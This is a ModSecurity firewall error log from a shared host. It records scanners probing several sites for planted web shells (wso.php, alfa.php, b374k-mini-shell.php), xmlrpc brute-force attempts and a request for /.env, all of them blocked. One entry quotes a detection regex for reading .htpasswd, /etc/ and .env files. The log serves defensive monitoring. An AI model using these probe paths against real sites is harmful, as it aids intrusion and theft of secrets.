[Tue May 26 13:51:05.355701 2026] [security2:error] [pid 555743:tid 555964] [client 185.92.25.95:59011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahVX8cjqAquC0YaxQjC2cwAAAWU"]
[Tue May 26 13:51:05.602730 2026] [security2:error] [pid 555743:tid 555912] [client 15.235.169.50:49618] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-the1me.php"] [unique_id "ahVX8cjqAquC0YaxQjC2dgAAATE"]
[Tue May 26 13:51:05.836620 2026] [security2:error] [pid 555743:tid 555920] [client 20.196.127.68:13272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/about.php"] [unique_id "ahVX8cjqAquC0YaxQjC2fAAAATk"]
[Tue May 26 13:51:05.879108 2026] [security2:error] [pid 555743:tid 555880] [client 185.192.71.243:45093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/about.php"] [unique_id "ahVX8cjqAquC0YaxQjC2ewAAARE"]
[Tue May 26 13:51:06.087365 2026] [security2:error] [pid 560287:tid 560439] [client 15.235.169.50:49682] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/alfa.php"] [unique_id "ahVX8pmX5s6sDS3wJVcWKwAAAJo"]
[Tue May 26 13:51:06.210106 2026] [security2:error] [pid 560287:tid 560529] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX8ZmX5s6sDS3wJVcWJwAAAO8"]
[Tue May 26 13:51:06.418020 2026] [security2:error] [pid 555743:tid 555982] [client 20.196.127.68:15684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/atomlib.php"] [unique_id "ahVX8sjqAquC0YaxQjC2gwAAAXc"]
[Tue May 26 13:51:06.432486 2026] [security2:error] [pid 560287:tid 560496] [client 185.192.71.238:30847] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/admin.php"] [unique_id "ahVX8pmX5s6sDS3wJVcWMQAAAM8"]
[Tue May 26 13:51:06.565645 2026] [security2:error] [pid 560287:tid 560460] [client 15.235.169.50:49744] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/bannerads/1578087141_v3.php"] [unique_id "ahVX8pmX5s6sDS3wJVcWNQAAAK0"]
[Tue May 26 13:51:07.043362 2026] [security2:error] [pid 555743:tid 555976] [client 15.235.169.50:49815] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/fonts/wp-login.php"] [unique_id "ahVX88jqAquC0YaxQjC2jAAAAXE"]
[Tue May 26 13:51:07.069966 2026] [security2:error] [pid 555743:tid 555973] [client 20.196.127.68:13248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/alfa-rex.php7"] [unique_id "ahVX88jqAquC0YaxQjC2jQAAAW4"]
[Tue May 26 13:51:07.307020 2026] [security2:error] [pid 555743:tid 555916] [client 185.92.25.103:46787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/mah.php"] [unique_id "ahVX88jqAquC0YaxQjC2lQAAATU"]
[Tue May 26 13:51:07.432259 2026] [security2:error] [pid 555743:tid 555968] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX88jqAquC0YaxQjC2iwAAAWk"]
[Tue May 26 13:51:07.508453 2026] [security2:error] [pid 560287:tid 560505] [client 15.235.169.50:49860] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/jcrop/Jcrop.php"] [unique_id "ahVX85mX5s6sDS3wJVcWOwAAANc"]
[Tue May 26 13:51:07.701029 2026] [security2:error] [pid 555743:tid 555904] [client 20.196.127.68:13505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/b.php"] [unique_id "ahVX88jqAquC0YaxQjC2ogAAASk"]
[Tue May 26 13:51:07.803752 2026] [security2:error] [pid 560287:tid 560516] [client 185.92.25.97:40507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/.wp/wso.php"] [unique_id "ahVX85mX5s6sDS3wJVcWPgAAAOI"]
[Tue May 26 13:51:08.002875 2026] [security2:error] [pid 560287:tid 560552] [client 15.235.169.50:49933] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/PHPMailer/plugins.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWQAAAAQQ"]
[Tue May 26 13:51:08.279514 2026] [security2:error] [pid 560287:tid 560539] [client 185.192.71.241:64449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 241.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/core.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWQwAAAPc"]
[Tue May 26 13:51:08.347829 2026] [security2:error] [pid 560287:tid 560444] [client 20.196.127.68:13518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/buy.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWRAAAAJ4"]
[Tue May 26 13:51:08.473737 2026] [security2:error] [pid 560287:tid 560507] [client 15.235.169.50:50009] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/settings.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWRQAAANk"]
[Tue May 26 13:51:08.737433 2026] [security2:error] [pid 560287:tid 560532] [client 185.92.25.137:64011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/robots.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWTAAAAPI"]
[Tue May 26 13:51:08.764151 2026] [security2:error] [pid 560287:tid 560519] [client 74.249.173.207:38984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sonaminahotels.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWUAAAAOU"]
[Tue May 26 13:51:08.948450 2026] [security2:error] [pid 560287:tid 560483] [client 20.196.127.68:13266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/bless.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWVAAAAMI"]
[Tue May 26 13:51:08.948606 2026] [security2:error] [pid 560287:tid 560525] [client 15.235.169.50:50096] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/customize/aogbgreen.php"] [unique_id "ahVX9JmX5s6sDS3wJVcWVQAAAOs"]
[Tue May 26 13:51:09.234911 2026] [security2:error] [pid 560287:tid 560428] [client 185.192.71.245:24237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 245.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVX9ZmX5s6sDS3wJVcWWAAAAI8"]
[Tue May 26 13:51:09.436970 2026] [security2:error] [pid 555743:tid 555934] [client 15.235.169.50:50154] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/bak.php"] [unique_id "ahVX9cjqAquC0YaxQjC2vQAAAUc"]
[Tue May 26 13:51:09.467406 2026] [security2:error] [pid 560287:tid 560462] [client 20.151.111.128:3468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahVX9ZmX5s6sDS3wJVcWXQAAAK8"], referer: www.google.com
[Tue May 26 13:51:09.468051 2026] [security2:error] [pid 555743:tid 555940] [client 20.151.111.128:4004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVX9cjqAquC0YaxQjC2wgAAAU0"], referer: www.google.com
[Tue May 26 13:51:09.588562 2026] [security2:error] [pid 560287:tid 560458] [client 20.196.127.68:15687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/class-t.api.php"] [unique_id "ahVX9ZmX5s6sDS3wJVcWYgAAAKs"]
[Tue May 26 13:51:09.694461 2026] [security2:error] [pid 555743:tid 555875] [client 20.151.111.128:3998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVX9cjqAquC0YaxQjC2xwAAAQw"]
[Tue May 26 13:51:09.754034 2026] [security2:error] [pid 555743:tid 555917] [client 185.92.25.107:27249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/mini.php"] [unique_id "ahVX9cjqAquC0YaxQjC2yAAAATY"]
[Tue May 26 13:51:09.918739 2026] [security2:error] [pid 555743:tid 555876] [client 15.235.169.50:50233] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/Marvins.php"] [unique_id "ahVX9cjqAquC0YaxQjC2zAAAAQ0"]
[Tue May 26 13:51:09.924871 2026] [security2:error] [pid 560287:tid 560432] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX9ZmX5s6sDS3wJVcWXwAAAJM"]
[Tue May 26 13:51:10.238818 2026] [security2:error] [pid 560287:tid 560521] [client 20.196.127.68:13524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/cache.php"] [unique_id "ahVX9pmX5s6sDS3wJVcWaQAAAOc"]
[Tue May 26 13:51:10.301650 2026] [security2:error] [pid 555743:tid 555973] [client 185.192.71.237:63209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/goods.php"] [unique_id "ahVX9sjqAquC0YaxQjC20AAAAW4"]
[Tue May 26 13:51:10.393340 2026] [security2:error] [pid 560287:tid 560491] [client 15.235.169.50:50311] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/1.php"] [unique_id "ahVX9pmX5s6sDS3wJVcWbwAAAMo"]
[Tue May 26 13:51:10.687033 2026] [security2:error] [pid 560287:tid 560422] [client 185.92.25.101:54929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/file5.php"] [unique_id "ahVX9pmX5s6sDS3wJVcWdQAAAIk"]
[Tue May 26 13:51:10.891092 2026] [security2:error] [pid 555743:tid 555907] [client 15.235.169.50:50383] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-conflg.php"] [unique_id "ahVX9sjqAquC0YaxQjC21QAAASw"]
[Tue May 26 13:51:10.893560 2026] [security2:error] [pid 555743:tid 555926] [client 20.196.127.68:14959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/content.php"] [unique_id "ahVX9sjqAquC0YaxQjC21gAAAT8"]
[Tue May 26 13:51:11.068900 2026] [security2:error] [pid 555743:tid 555959] [client 129.222.147.134:19151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX9sjqAquC0YaxQjC21wAAAWA"]
[Tue May 26 13:51:11.069054 2026] [security2:error] [pid 555743:tid 555959] [client 129.222.147.134:19151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX9sjqAquC0YaxQjC21wAAAWA"]
[Tue May 26 13:51:11.321049 2026] [security2:error] [pid 555743:tid 555899] [client 207.241.173.79:25260] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env"] [unique_id "ahVX98jqAquC0YaxQjC26AAAASQ"]
[Tue May 26 13:51:11.382670 2026] [security2:error] [pid 560287:tid 560452] [client 15.235.169.50:50478] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/upgrade/pdf.php"] [unique_id "ahVX95mX5s6sDS3wJVcWeQAAAKY"]
[Tue May 26 13:51:11.383870 2026] [security2:error] [pid 560287:tid 560528] [client 185.192.71.232:59211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/ahax.php"] [unique_id "ahVX95mX5s6sDS3wJVcWeAAAAO4"]
[Tue May 26 13:51:11.511573 2026] [security2:error] [pid 555743:tid 555952] [client 20.196.127.68:13517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/classwithtostring.php"] [unique_id "ahVX98jqAquC0YaxQjC27QAAAVk"]
[Tue May 26 13:51:11.531903 2026] [security2:error] [pid 555743:tid 555941] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX98jqAquC0YaxQjC25AAAAU4"]
[Tue May 26 13:51:11.683205 2026] [security2:error] [pid 560287:tid 560490] [client 106.192.248.115:50148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX95mX5s6sDS3wJVcWfAAAAMk"]
[Tue May 26 13:51:11.683366 2026] [security2:error] [pid 560287:tid 560490] [client 106.192.248.115:50148] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX95mX5s6sDS3wJVcWfAAAAMk"]
[Tue May 26 13:51:11.858563 2026] [security2:error] [pid 560287:tid 560507] [client 15.235.169.50:50540] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/wp-includes/js/tinymce/wp-tinymce.php"] [unique_id "ahVX95mX5s6sDS3wJVcWiAAAANk"]
[Tue May 26 13:51:11.863349 2026] [security2:error] [pid 555743:tid 555892] [client 185.92.25.137:25115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/f35.php"] [unique_id "ahVX98jqAquC0YaxQjC29AAAAR0"]
[Tue May 26 13:51:12.076518 2026] [security2:error] [pid 560287:tid 560533] [client 45.84.107.172:35021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.107.84.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/contact-2/"] [unique_id "ahVX-JmX5s6sDS3wJVcWiwAAAPM"], referer: http://virgence.com/index.php/contact-2/
[Tue May 26 13:51:12.140307 2026] [security2:error] [pid 560287:tid 560522] [client 20.196.127.68:14973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/css.php"] [unique_id "ahVX-JmX5s6sDS3wJVcWjQAAAOg"]
[Tue May 26 13:51:12.329008 2026] [security2:error] [pid 560287:tid 560455] [client 91.230.225.177:61461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/simple.php"] [unique_id "ahVX-JmX5s6sDS3wJVcWlAAAAKg"]
[Tue May 26 13:51:12.351189 2026] [security2:error] [pid 560287:tid 560483] [client 15.235.169.50:50632] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/plugins/compat3x/content.php"] [unique_id "ahVX-JmX5s6sDS3wJVcWlQAAAMI"]
[Tue May 26 13:51:12.593087 2026] [security2:error] [pid 555743:tid 555963] [client 20.151.111.128:4005] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVX9cjqAquC0YaxQjC2wwAAAWQ"], referer: www.google.com
[Tue May 26 13:51:12.680473 2026] [security2:error] [pid 560287:tid 560473] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX-JmX5s6sDS3wJVcWkwAAALk"]
[Tue May 26 13:51:12.753052 2026] [security2:error] [pid 560287:tid 560517] [client 20.196.127.68:14922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/chosen.php"] [unique_id "ahVX-JmX5s6sDS3wJVcWnQAAAOM"]
[Tue May 26 13:51:12.824520 2026] [security2:error] [pid 560287:tid 560445] [client 15.235.169.50:50696] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/baooorix.php"] [unique_id "ahVX-JmX5s6sDS3wJVcWngAAAJ8"]
[Tue May 26 13:51:12.934413 2026] [security2:error] [pid 555743:tid 555977] [client 185.92.25.98:48429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/amax.php"] [unique_id "ahVX-MjqAquC0YaxQjC3AwAAAXI"]
[Tue May 26 13:51:13.328240 2026] [security2:error] [pid 555743:tid 555928] [client 15.235.169.50:50746] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/b374k-mini-shell.php"] [unique_id "ahVX-cjqAquC0YaxQjC3CAAAAUE"]
[Tue May 26 13:51:13.342916 2026] [security2:error] [pid 555743:tid 555917] [client 20.196.127.68:15682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/doc.php"] [unique_id "ahVX-cjqAquC0YaxQjC3CQAAATY"]
